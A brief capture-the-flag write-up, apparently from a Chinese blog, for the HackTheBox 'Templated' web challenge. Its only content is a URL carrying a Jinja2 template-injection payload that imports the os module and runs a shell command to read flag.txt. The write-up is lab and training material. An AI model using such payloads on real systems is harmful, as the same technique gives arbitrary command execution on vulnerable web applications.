HackTheBox-CTF-Templated atsud0 2021-04-11 靶机实验 › CTF Web Can you exploit this simple mistake? 浏览器访问 1http://138.68.182.108:31553/{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}